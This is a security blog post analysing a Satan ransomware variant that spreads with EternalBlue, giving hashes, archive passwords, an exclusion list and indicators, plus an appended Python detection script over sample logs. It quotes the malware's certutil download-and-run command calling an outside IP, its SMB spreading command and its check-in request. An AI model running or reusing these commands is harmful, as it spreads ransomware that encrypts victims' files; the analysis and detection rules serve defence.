Today, MalwareHunterTeam reached out to me about a possible new variant of Satan ransomware.
Satan ransomware itself has been around since January 2017 as reported by Bleeping Computer.
In this blog post we’ll analyse a new version of the infamous Satan ransomware, which since November 2017 has been using the EternalBlue exploit to spread via the network, and consequently encrypt files.
First up is a file inconspicuously named “sts.exe”, which may refer to “Satan spreader”.
- MD5: 12bc52fd9da66db3e63bfb196ceb9be6
- SHA1: 4508e3442673c149b31e3fffc29cc95f834975bc
- SHA256: b686cba1894f8ab5cec0ce5db195022def00204f6cd143a325608ec93e8b74ee
- Compilation timestamp: 2018-04-14 06:33:08
- VirusTotal report:
|Figure 1 – download and extract two new files|
- ms.exe has password: iamsatancryptor
- client.exe has password: abcdefghijklmn
|Figure 2 – UAC prompt|
Client.exe (94868520b220d57ec9df605839128c9b) is, as mentioned earlier, an SFX archive and will hold the actual Satan ransomware, named “Cryptor.exe”. Figure 2 shows the command line options.
|Figure 3 – End of setup screen|
ms.exe (770ddc649b8784989eed4cee10e8aa04) on the other hand will drop and load the EternalBlue exploit, and starts scanning for vulnerable hosts. Required files will be dropped in the C:\ProgramData folder, as seen in Figure 3. Note it uses a publicly available implementation of the exploit – it does not appear to use its own.
cmd /c cd /D C:\Users\Alluse~1\&blue.exe --TargetIp & star.exe --OutConfig a --TargetPort 445 --Protocol SMB --Architecture x64 --Function RunDLL --DllPayload down64.dll --TargetIp
|Figure 4 – Spreading attempt over SMB, port 445|
down64.dll (17f8d5aff617bb729fcc79be322fcb67) will be loaded in memory using DoublePulsar, and executes the following command:
cmd.exe /c certutil.exe -urlcache -split -f http://126.96.36.199/cab/sts.exe c:/sts.exe&c:\sts.exe
This payload is also packed with PECompact 2. As usual, any database-related services and processes are stopped and killed, so that database files which would otherwise be locked by those processes can be encrypted as well.
|Figure 5 – Database-related processes|
What’s new in this version of Satan is that the exclusion list has changed slightly – it will not encrypt files with any of the following words in their path:
windows, python2, python3, microsoft games, boot, i386, ST_V22, intel, dvd maker, recycle, libs, all users, 360rec, 360sec, 360sand, favorites, common files, internet explorer, msbuild, public, 360downloads, windows defen, windows mail, windows media pl, windows nt, windows photo viewer, windows sidebar, default user
|Figure 6 – Ransom note|
GET /data/token.php?status=ST&code=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.1
Connection: Keep-Alive
User-Agent: Winnet Client
Host: 188.8.131.52
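The three artefacts quoted above (the certutil download, the blue.exe/star.exe spreading command and the token.php check-in) are distinctive enough to hunt for in process-creation and proxy logs. The following is an added example, not code from the original post: a small rule set run over constructed log lines. The log format, the target IP 10.0.0.7 and the code value are assumptions; the rules also accept a single dash or an en dash in case the command line was mangled the way the blog rendering was.

```python
import re

# Constructed sample process-creation and proxy log lines (not taken from the original post),
# modelled on the command lines and the check-in request quoted in the write-up.
SAMPLE_LOGS = [
    r"2018-04-16 10:01:02 host1 ProcessCreate Image=C:\Windows\System32\cmd.exe "
    r"CommandLine=cmd.exe /c certutil.exe -urlcache -split -f http://126.96.36.199/cab/sts.exe c:/sts.exe&c:\sts.exe",
    r"2018-04-16 10:01:05 host1 ProcessCreate Image=C:\Windows\System32\cmd.exe "
    r"CommandLine=cmd /c cd /D C:\Users\Alluse~1\&blue.exe --TargetIp 10.0.0.7 & star.exe --OutConfig a "
    r"--TargetPort 445 --Protocol SMB --Architecture x64 --Function RunDLL --DllPayload down64.dll --TargetIp 10.0.0.7",
    r"2018-04-16 10:01:09 host1 proxy GET /data/token.php?status=ST&code=ABCDEF0123 ua=Winnet Client",
    r"2018-04-16 10:02:00 host2 ProcessCreate Image=C:\Windows\System32\notepad.exe CommandLine=notepad.exe C:\notes.txt",
]

RULES = {
    # certutil abused as a downloader: -urlcache together with -f and a URL saved to a local path
    "certutil_download": re.compile(r"certutil(\.exe)?\s+.*-urlcache\b.*-f\s+https?://", re.I),
    # public EternalBlue/DoublePulsar tooling aimed at SMB on 445 with a DLL payload; the option prefix
    # may be '-', '--' or an en dash (\u2013) depending on how the command line was rendered
    "eternalblue_spread": re.compile(
        r"[-\u2013]+TargetPort\s+445\b.*[-\u2013]+Protocol\s+SMB\b.*[-\u2013]+DllPayload\s+\S+", re.I),
    # Satan check-in: token.php with status/code parameters and the 'Winnet Client' user agent
    "satan_checkin": re.compile(r"/data/token\.php\?status=\w+&code=[0-9A-F]+.*Winnet Client", re.I),
}

def scan_line(line):
    """Return the names of all rules that match a single log line."""
    return [name for name, rx in RULES.items() if rx.search(line)]

def scan_logs(lines):
    """Map each matching log line to its rule hits; lines without hits are omitted."""
    hits = {}
    for line in lines:
        matched = scan_line(line)
        if matched:
            hits[line] = matched
    return hits

if __name__ == "__main__":
    for line, matched in scan_logs(SAMPLE_LOGS).items():
        print(", ".join(matched), "<-", line[:80])
```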
For additional reading, see this excellent post by Tencent, who discovered a similar variant using EternalBlue earlier in April this year.
*** This is a Security Bloggers Network syndicated blog from Blaze's Security Blog authored by Bart. Read the original post at: https://bartblaze.blogspot.com/2018/04/satan-ransomware-adds-eternalblue.html